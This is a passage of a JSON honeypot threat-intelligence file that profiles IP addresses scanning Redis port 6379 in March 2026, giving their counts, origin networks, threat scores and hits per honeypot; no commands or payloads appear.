        "days_since_last_seen": 3
      },
      "honeypot_breakdown_30d": {
        "Suricata": 5
      }
    },
    "65.49.1.52": {
      "attack_count": 26,
      "first_seen": "2026-03-10T00:12:06.000Z",
      "last_seen": "2026-03-10T00:13:56.055Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 6939,
      "as_org": "Hurricane Electric LLC",
      "threat_score": 94.7,
      "threat_level": "critical",
      "score_components": {
        "frequency": 24.7,
        "persistence": 25,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 292,
        "days_active_30d": 30,
        "ports_targeted_30d": 84,
        "honeypots_triggered_30d": 9,
        "first_seen_30d": "2026-03-02T04:00:53+00:00",
        "last_seen_30d": "2026-03-31T03:46:28.374000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 174,
        "Honeytrap": 86,
        "Redishoneypot": 11,
        "Miniprint": 8,
        "Adbhoney": 4,
        "ConPot": 3,
        "Cowrie": 3,
        "Dionaea": 2,
        "ElasticPot": 1
      }
    },
    "65.49.20.69": {
      "attack_count": 26,
      "first_seen": "2026-03-20T14:36:15.000Z",
      "last_seen": "2026-03-20T14:38:01.500Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 6939,
      "as_org": "Hurricane Electric LLC",
      "threat_score": 96.3,
      "threat_level": "critical",
      "score_components": {
        "frequency": 26.3,
        "persistence": 25,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 427,
        "days_active_30d": 30,
        "ports_targeted_30d": 86,
        "honeypots_triggered_30d": 10,
        "first_seen_30d": "2026-03-02T06:07:11+00:00",
        "last_seen_30d": "2026-03-31T11:16:22.620000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 234,
        "Honeytrap": 148,
        "Redishoneypot": 11,
        "Miniprint": 8,
        "ConPot": 6,
        "Dionaea": 6,
        "Mailoney": 6,
        "Cowrie": 3,
        "ElasticPot": 3,
        "Adbhoney": 2
      }
    },
    "20.65.194.81": {
      "attack_count": 24,
      "first_seen": "2026-03-02T06:10:23.000Z",
      "last_seen": "2026-03-02T06:13:42.887Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "San Antonio",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 40.1,
      "threat_level": "medium",
      "score_components": {
        "frequency": 15.4,
        "persistence": 15.8,
        "diversity": 12,
        "spread": 20,
        "recency_factor": 0.63
      },
      "reputation_metrics": {
        "total_events_30d": 35,
        "days_active_30d": 19,
        "ports_targeted_30d": 6,
        "honeypots_triggered_30d": 4,
        "first_seen_30d": "2026-03-02T06:11:25.515000+00:00",
        "last_seen_30d": "2026-03-20T20:09:28.490000+00:00",
        "days_since_last_seen": 11
      },
      "honeypot_breakdown_30d": {
        "Suricata": 20,
        "Honeytrap": 8,
        "Redishoneypot": 5,
        "Dionaea": 2
      }
    },
    "180.188.47.6": {
      "attack_count": 21,
      "first_seen": "2026-03-03T20:40:50.000Z",
      "last_seen": "2026-03-11T15:21:42.645Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 133775,
      "as_org": "Xiamen",
      "threat_score": 6.8,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 6.0,
        "persistence": 7.5,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.33
      },
      "reputation_metrics": {
        "total_events_30d": 4,
        "days_active_30d": 9,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-03T20:41:55.558000+00:00",
        "last_seen_30d": "2026-03-11T15:21:42.645000+00:00",
        "days_since_last_seen": 20
      },
      "honeypot_breakdown_30d": {
        "Suricata": 4
      }
    },
    "134.209.78.215": {
      "attack_count": 20,
      "first_seen": "2026-03-11T18:52:58.000Z",
      "last_seen": "2026-03-11T19:03:06.632Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "North Bergen",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 20.2,
      "threat_level": "low",
      "score_components": {
        "frequency": 19.5,
        "persistence": 2.5,
        "diversity": 18,
        "spread": 15,
        "recency_factor": 0.37
      },
      "reputation_metrics": {
        "total_events_30d": 89,
        "days_active_30d": 3,
        "ports_targeted_30d": 9,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-10T15:49:14+00:00",
        "last_seen_30d": "2026-03-12T00:25:38.204000+00:00",
        "days_since_last_seen": 19
      },
      "honeypot_breakdown_30d": {
        "Suricata": 53,
        "Honeytrap": 28,
        "Redishoneypot": 8
      }
    },
    "143.198.64.48": {
      "attack_count": 20,
      "first_seen": "2026-03-23T05:44:22.000Z",
      "last_seen": "2026-03-23T05:45:31.587Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Santa Clara",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 61.7,
      "threat_level": "high",
      "score_components": {
        "frequency": 30,
        "persistence": 9.2,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.73
      },
      "reputation_metrics": {
        "total_events_30d": 119095,
        "days_active_30d": 11,
        "ports_targeted_30d": 65658,
        "honeypots_triggered_30d": 16,
        "first_seen_30d": "2026-03-13T13:05:18+00:00",
        "last_seen_30d": "2026-03-23T05:54:58.968000+00:00",
        "days_since_last_seen": 8
      },
      "honeypot_breakdown_30d": {
        "Suricata": 105715,
        "Honeytrap": 13322,
        "ConPot": 10,
        "Cowrie": 10,
        "Dionaea": 10,
        "Miniprint": 8,
        "Mailoney": 6,
        "Redishoneypot": 3,
        "Adbhoney": 2,
        "Dicompot": 2,
        "ElasticPot": 1,
        "Honeyaml": 1,
        "Ipphoney": 1,
        "Medpot": 1,
        "Tanner": 1
      }
    },
    "159.203.30.22": {
      "attack_count": 20,
      "first_seen": "2026-03-04T13:55:49.000Z",
      "last_seen": "2026-03-04T13:56:54.846Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Canada",
      "country_code": "CA",
      "city": "Toronto",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 56.5,
      "threat_level": "medium",
      "score_components": {
        "frequency": 30,
        "persistence": 14.2,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.63
      },
      "reputation_metrics": {
        "total_events_30d": 127173,
        "days_active_30d": 17,
        "ports_targeted_30d": 65526,
        "honeypots_triggered_30d": 15,
        "first_seen_30d": "2026-03-04T13:53:35+00:00",
        "last_seen_30d": "2026-03-20T23:44:15.063000+00:00",
        "days_since_last_seen": 11
      },
      "honeypot_breakdown_30d": {
        "Suricata": 112035,
        "Honeytrap": 15074,
        "Cowrie": 12,
        "Mailoney": 12,
        "Dionaea": 10,
        "ConPot": 9,
        "Miniprint": 8,
        "Redishoneypot": 3,
        "Adbhoney": 2,
        "Dicompot": 2,
        "ElasticPot": 1,
        "Honeyaml": 1,
        "Medpot": 1,
        "Tanner": 1
      }
    },
    "159.223.173.197": {
      "attack_count": 20,
      "first_seen": "2026-03-21T20:23:05.000Z",
      "last_seen": "2026-03-21T20:24:15.077Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "North Bergen",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 48.9,
      "threat_level": "medium",
      "score_components": {
        "frequency": 24.2,
        "persistence": 2.5,
        "diversity": 20,
        "spread": 20,
        "recency_factor": 0.73
      },
      "reputation_metrics": {
        "total_events_30d": 264,
        "days_active_30d": 3,
        "ports_targeted_30d": 13,
        "honeypots_triggered_30d": 4,
        "first_seen_30d": "2026-03-21T19:17:48+00:00",
        "last_seen_30d": "2026-03-23T10:52:22.143000+00:00",
        "days_since_last_seen": 8
      },
      "honeypot_breakdown_30d": {
        "Suricata": 172,
        "Honeytrap": 82,
        "Redishoneypot": 8,
        "ElasticPot": 2
      }
    },
    "202.121.66.3": {
      "attack_count": 20,
      "first_seen": "2026-03-12T10:51:23.000Z",
      "last_seen": "2026-03-29T10:08:12.000Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 4538,
      "as_org": "China Education and Research Network Center",
      "threat_score": 26.2,
      "threat_level": "low",
      "score_components": {
        "frequency": 6.0,
        "persistence": 15.0,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.93
      },
      "reputation_metrics": {
        "total_events_30d": 4,
        "days_active_30d": 18,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-12T10:52:26.426000+00:00",
        "last_seen_30d": "2026-03-29T10:08:12+00:00",
        "days_since_last_seen": 2
      },
      "honeypot_breakdown_30d": {
        "Suricata": 4
      }
    },
    "64.227.30.79": {
      "attack_count": 20,
      "first_seen": "2026-03-07T18:59:11.000Z",
      "last_seen": "2026-03-07T19:09:12.760Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "North Bergen",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 13.9,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 23.5,
        "persistence": 0.8,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.2
      },
      "reputation_metrics": {
        "total_events_30d": 226,
        "days_active_30d": 1,
        "ports_targeted_30d": 14,
        "honeypots_triggered_30d": 5,
        "first_seen_30d": "2026-03-07T04:21:17+00:00",
        "last_seen_30d": "2026-03-07T21:40:42.235000+00:00",
        "days_since_last_seen": 24
      },
      "honeypot_breakdown_30d": {
        "Suricata": 144,
        "Honeytrap": 69,
        "Redishoneypot": 8,
        "ElasticPot": 4,
        "Dionaea": 1
      }
    },
    "157.245.252.5": {
      "attack_count": 19,
      "first_seen": "2026-03-12T03:43:50.000Z",
      "last_seen": "2026-03-12T03:44:55.897Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "North Bergen",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 30.6,
      "threat_level": "low",
      "score_components": {
        "frequency": 30,
        "persistence": 8.3,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.37
      },
      "reputation_metrics": {
        "total_events_30d": 122958,
        "days_active_30d": 10,
        "ports_targeted_30d": 64086,
        "honeypots_triggered_30d": 16,
        "first_seen_30d": "2026-03-03T07:45:23+00:00",
        "last_seen_30d": "2026-03-12T03:53:54.401000+00:00",
        "days_since_last_seen": 19
      },
      "honeypot_breakdown_30d": {
        "Suricata": 107895,
        "Honeytrap": 15008,
        "Dionaea": 10,
        "ConPot": 9,
        "Cowrie": 8,
        "Miniprint": 8,
        "Mailoney": 6,
        "Redishoneypot": 3,
        "Adbhoney": 2,
        "Dicompot": 2,
        "ElasticPot": 1,
        "Honeyaml": 1,
        "Ipphoney": 1,
        "Medpot": 1,
        "Tanner": 1
      }
    },
    "159.89.226.104": {
      "attack_count": 18,
      "first_seen": "2026-03-07T18:59:03.000Z",
      "last_seen": "2026-03-07T19:09:13.755Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "North Bergen",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 4.3,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 8.5,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.2
      },
      "reputation_metrics": {
        "total_events_30d": 7,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-07T18:59:04+00:00",
        "last_seen_30d": "2026-03-07T19:09:13.755000+00:00",
        "days_since_last_seen": 24
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 5,
        "Suricata": 2
      }
    },
    "178.128.144.99": {
      "attack_count": 18,
      "first_seen": "2026-03-15T12:20:39.000Z",
      "last_seen": "2026-03-15T12:21:56.310Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "North Bergen",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 16.4,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 13.6,
        "persistence": 2.5,
        "diversity": 4,
        "spread": 15,
        "recency_factor": 0.47
      },
      "reputation_metrics": {
        "total_events_30d": 23,
        "days_active_30d": 3,
        "ports_targeted_30d": 2,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-13T21:13:56+00:00",
        "last_seen_30d": "2026-03-15T12:21:56.310000+00:00",
        "days_since_last_seen": 16
      },
      "honeypot_breakdown_30d": {
        "Suricata": 11,
        "Honeytrap": 7,
        "Redishoneypot": 5
      }
    },
    "209.15.113.94": {
      "attack_count": 18,
      "first_seen": "2026-03-13T14:28:19.000Z",
      "last_seen": "2026-03-15T22:28:05.823Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Thailand",
      "country_code": "TH",
      "city": null,
      "asn": 135566,
      "as_org": "National Telecom Public Company Limited",
      "threat_score": 11.0,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 9.0,
        "persistence": 2.5,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.47
      },
      "reputation_metrics": {
        "total_events_30d": 8,
        "days_active_30d": 3,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-13T14:28:19+00:00",
        "last_seen_30d": "2026-03-15T22:28:05.823000+00:00",
        "days_since_last_seen": 16
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 6,
        "Suricata": 2
      }
    },
    "142.93.125.163": {
      "attack_count": 17,
      "first_seen": "2026-03-11T18:49:34.000Z",
      "last_seen": "2026-03-11T18:50:43.089Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "North Bergen",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 11.4,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 13.6,
        "persistence": 1.7,
        "diversity": 4,
        "spread": 15,
        "recency_factor": 0.33
      },
      "reputation_metrics": {
        "total_events_30d": 23,
        "days_active_30d": 2,
        "ports_targeted_30d": 2,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-10T19:55:37+00:00",
        "last_seen_30d": "2026-03-11T18:50:43.089000+00:00",
        "days_since_last_seen": 20
      },
      "honeypot_breakdown_30d": {
        "Suricata": 11,
        "Honeytrap": 7,
        "Redishoneypot": 5
      }
    },
    "206.189.205.166": {
      "attack_count": 17,
      "first_seen": "2026-03-29T07:46:32.000Z",
      "last_seen": "2026-03-29T07:47:40.446Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "North Bergen",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 45.6,
      "threat_level": "medium",
      "score_components": {
        "frequency": 19.1,
        "persistence": 1.7,
        "diversity": 8,
        "spread": 20,
        "recency_factor": 0.93
      },
      "reputation_metrics": {
        "total_events_30d": 82,
        "days_active_30d": 2,
        "ports_targeted_30d": 4,
        "honeypots_triggered_30d": 4,
        "first_seen_30d": "2026-03-28T20:43:08.777000+00:00",
        "last_seen_30d": "2026-03-29T09:21:30.865000+00:00",
        "days_since_last_seen": 2
      },
      "honeypot_breakdown_30d": {
        "Suricata": 46,
        "Honeytrap": 29,
        "Redishoneypot": 5,
        "Dionaea": 2
      }
    },
    "86.54.31.34": {
      "attack_count": 17,
      "first_seen": "2026-03-10T08:23:17.000Z",
      "last_seen": "2026-03-10T08:24:26.807Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Canada",
      "country_code": "CA",
      "city": null,
      "asn": 12989,
      "as_org": "Black HOST Ltd",
      "threat_score": 96.7,
      "threat_level": "critical",
      "score_components": {
        "frequency": 26.7,
        "persistence": 25,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 470,
        "days_active_30d": 30,
        "ports_targeted_30d": 72,
        "honeypots_triggered_30d": 8,
        "first_seen_30d": "2026-03-02T16:07:39.145000+00:00",
        "last_seen_30d": "2026-03-31T22:49:38.207000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 346,
        "Honeytrap": 102,
        "Ciscoasa": 9,
        "Redishoneypot": 5,
        "Dionaea": 3,
        "ConPot": 2,
        "Ipphoney": 2,
        "Mailoney": 1
      }
    },
    "134.33.66.164": {
      "attack_count": 16,
      "first_seen": "2026-03-29T20:15:00.000Z",
      "last_seen": "2026-03-29T20:17:22.215Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Phoenix",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 55.5,
      "threat_level": "medium",
      "score_components": {
        "frequency": 11.1,
        "persistence": 23.3,
        "diversity": 10,
        "spread": 15,
        "recency_factor": 0.93
      },
      "reputation_metrics": {
        "total_events_30d": 13,
        "days_active_30d": 28,
        "ports_targeted_30d": 5,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-02T03:17:58.064000+00:00",
        "last_seen_30d": "2026-03-29T20:17:22.215000+00:00",
        "days_since_last_seen": 2
      },
      "honeypot_breakdown_30d": {
        "Suricata": 8,
        "Redishoneypot": 3,
        "Honeytrap": 2
      }
    },
    "176.240.149.82": {
      "attack_count": 16,
      "first_seen": "2026-03-18T00:47:46.000Z",
      "last_seen": "2026-03-21T07:57:01.513Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "T\u00fcrkiye",
      "country_code": "TR",
      "city": null,
      "asn": 47524,
      "as_org": "Turksat Uydu Haberlesme ve Kablo TV Isletme A.S.",
      "threat_score": 15.9,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 8.5,
        "persistence": 3.3,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.67
      },
      "reputation_metrics": {
        "total_events_30d": 7,
        "days_active_30d": 4,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-18T00:48:52.363000+00:00",
        "last_seen_30d": "2026-03-21T07:57:01.513000+00:00",
        "days_since_last_seen": 10
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 5,
        "Suricata": 2
      }
    },
    "195.154.200.178": {
      "attack_count": 16,
      "first_seen": "2026-03-06T13:20:11.000Z",
      "last_seen": "2026-03-06T13:23:26.666Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "France",
      "country_code": "FR",
      "city": "Paris",
      "asn": 12876,
      "as_org": "Scaleway S.a.s.",
      "threat_score": 14.9,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 24.7,
        "persistence": 5.0,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.2
      },
      "reputation_metrics": {
        "total_events_30d": 294,
        "days_active_30d": 6,
        "ports_targeted_30d": 60,
        "honeypots_triggered_30d": 7,
        "first_seen_30d": "2026-03-02T02:16:01.666000+00:00",
        "last_seen_30d": "2026-03-07T10:19:46.716000+00:00",
        "days_since_last_seen": 24
      },
      "honeypot_breakdown_30d": {
        "Suricata": 202,
        "Honeytrap": 72,
        "Dionaea": 9,
        "Cowrie": 4,
        "H0neytr4p": 3,
        "Redishoneypot": 3,
        "Tanner": 1
      }
    },
    "20.40.250.19": {
      "attack_count": 16,
      "first_seen": "2026-03-03T16:22:57.000Z",
      "last_seen": "2026-03-03T16:25:35.879Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Des Moines",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 56.7,
      "threat_level": "medium",
      "score_components": {
        "frequency": 13.2,
        "persistence": 22.5,
        "diversity": 10,
        "spread": 15,
        "recency_factor": 0.93
      },
      "reputation_metrics": {
        "total_events_30d": 21,
        "days_active_30d": 27,
        "ports_targeted_30d": 5,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-03T16:24:01.392000+00:00",
        "last_seen_30d": "2026-03-29T05:37:59.107000+00:00",
        "days_since_last_seen": 2
      },
      "honeypot_breakdown_30d": {
        "Suricata": 12,
        "Honeytrap": 6,
        "Redishoneypot": 3
      }
    },
    "212.132.86.38": {
      "attack_count": 16,
      "first_seen": "2026-03-03T22:16:03.000Z",
      "last_seen": "2026-03-08T16:04:57.165Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Germany",
      "country_code": "DE",
      "city": null,
      "asn": 8560,
      "as_org": "IONOS SE",
      "threat_score": 3.9,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 4.8,
        "persistence": 5.0,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.23
      },
      "reputation_metrics": {
        "total_events_30d": 3,
        "days_active_30d": 6,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-03T22:17:07.769000+00:00",
        "last_seen_30d": "2026-03-08T16:04:57.165000+00:00",
        "days_since_last_seen": 23
      },
      "honeypot_breakdown_30d": {
        "Suricata": 3
      }
    },
    "172.210.68.13": {
      "attack_count": 15,
      "first_seen": "2026-03-17T18:55:20.000Z",
      "last_seen": "2026-03-17T18:58:29.157Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Washington",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 66.0,
      "threat_level": "high",
      "score_components": {
        "frequency": 13.8,
        "persistence": 22.5,
        "diversity": 12,
        "spread": 20,
        "recency_factor": 0.97
      },
      "reputation_metrics": {
        "total_events_30d": 24,
        "days_active_30d": 27,
        "ports_targeted_30d": 6,
        "honeypots_triggered_30d": 4,
        "first_seen_30d": "2026-03-04T11:47:26.142000+00:00",
        "last_seen_30d": "2026-03-30T12:29:06.433000+00:00",
        "days_since_last_seen": 1
      },
      "honeypot_breakdown_30d": {
        "Suricata": 16,
        "Honeytrap": 4,
        "Redishoneypot": 3,
        "ElasticPot": 1
      }
    },
    "20.169.81.111": {
      "attack_count": 15,
      "first_seen": "2026-03-02T02:07:39.000Z",
      "last_seen": "2026-03-02T02:09:21.466Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Phoenix",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 52.0,
      "threat_level": "medium",
      "score_components": {
        "frequency": 14.6,
        "persistence": 19.2,
        "diversity": 14,
        "spread": 20,
        "recency_factor": 0.77
      },
      "reputation_metrics": {
        "total_events_30d": 29,
        "days_active_30d": 23,
        "ports_targeted_30d": 7,
        "honeypots_triggered_30d": 4,
        "first_seen_30d": "2026-03-02T02:08:12+00:00",
        "last_seen_30d": "2026-03-24T01:29:25.752000+00:00",
        "days_since_last_seen": 7
      },
      "honeypot_breakdown_30d": {
        "Suricata": 22,
        "Redishoneypot": 3,
        "Dionaea": 2,
        "Honeytrap": 2
      }
    },
    "20.84.145.61": {
      "attack_count": 15,
      "first_seen": "2026-03-30T06:00:21.000Z",
      "last_seen": "2026-03-30T06:02:09.335Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Des Moines",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 61.7,
      "threat_level": "high",
      "score_components": {
        "frequency": 15.2,
        "persistence": 12.5,
        "diversity": 14,
        "spread": 20,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 33,
        "days_active_30d": 15,
        "ports_targeted_30d": 7,
        "honeypots_triggered_30d": 4,
        "first_seen_30d": "2026-03-17T03:50:13.054000+00:00",
        "last_seen_30d": "2026-03-31T02:16:36.122000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 22,
        "Honeytrap": 7,
        "Redishoneypot": 3,
        "Tanner": 1
      }
    },
    "40.76.124.118": {
      "attack_count": 15,
      "first_seen": "2026-03-25T00:38:06.000Z",
      "last_seen": "2026-03-25T00:39:46.920Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Washington",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 42.0,
      "threat_level": "medium",
      "score_components": {
        "frequency": 13.4,
        "persistence": 5.0,
        "diversity": 10,
        "spread": 20,
        "recency_factor": 0.87
      },
      "reputation_metrics": {
        "total_events_30d": 22,
        "days_active_30d": 6,
        "ports_targeted_30d": 5,
        "honeypots_triggered_30d": 4,
        "first_seen_30d": "2026-03-22T02:47:47+00:00",
        "last_seen_30d": "2026-03-27T02:52:58.923000+00:00",
        "days_since_last_seen": 4
      },
      "honeypot_breakdown_30d": {
        "Suricata": 13,
        "Honeytrap": 4,
        "Redishoneypot": 3,
        "Ciscoasa": 2
      }
    },
    "42.118.202.165": {
      "attack_count": 14,
      "first_seen": "2026-03-27T10:23:55.000Z",
      "last_seen": "2026-03-28T22:03:07.646Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Vietnam",
      "country_code": "VN",
      "city": "Ho Chi Minh City",
      "asn": 18403,
      "as_org": "FPT Telecom Company",
      "threat_score": 18.6,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 7.0,
        "persistence": 1.7,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.9
      },
      "reputation_metrics": {
        "total_events_30d": 5,
        "days_active_30d": 2,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-27T10:23:56+00:00",
        "last_seen_30d": "2026-03-28T22:03:07.646000+00:00",
        "days_since_last_seen": 3
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 3,
        "Suricata": 2
      }
    },
    "8.136.108.109": {
      "attack_count": 14,
      "first_seen": "2026-03-08T22:20:49.000Z",
      "last_seen": "2026-03-27T01:02:55.312Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Hangzhou",
      "asn": 37963,
      "as_org": "Hangzhou Alibaba Advertising Co.,Ltd.",
      "threat_score": 30.9,
      "threat_level": "low",
      "score_components": {
        "frequency": 7.0,
        "persistence": 16.7,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.87
      },
      "reputation_metrics": {
        "total_events_30d": 5,
        "days_active_30d": 20,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-08T22:21:52.189000+00:00",
        "last_seen_30d": "2026-03-27T01:02:55.312000+00:00",
        "days_since_last_seen": 4
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 3,
        "Suricata": 2
      }
    },
    "91.196.152.83": {
      "attack_count": 14,
      "first_seen": "2026-03-23T18:39:16.000Z",
      "last_seen": "2026-03-23T18:40:38.719Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "France",
      "country_code": "FR",
      "city": "Roubaix",
      "asn": 213412,
      "as_org": "ONYPHE SAS",
      "threat_score": 68.1,
      "threat_level": "high",
      "score_components": {
        "frequency": 15.9,
        "persistence": 20.8,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.83
      },
      "reputation_metrics": {
        "total_events_30d": 39,
        "days_active_30d": 25,
        "ports_targeted_30d": 14,
        "honeypots_triggered_30d": 5,
        "first_seen_30d": "2026-03-02T17:13:45+00:00",
        "last_seen_30d": "2026-03-26T15:33:18.616000+00:00",
        "days_since_last_seen": 5
      },
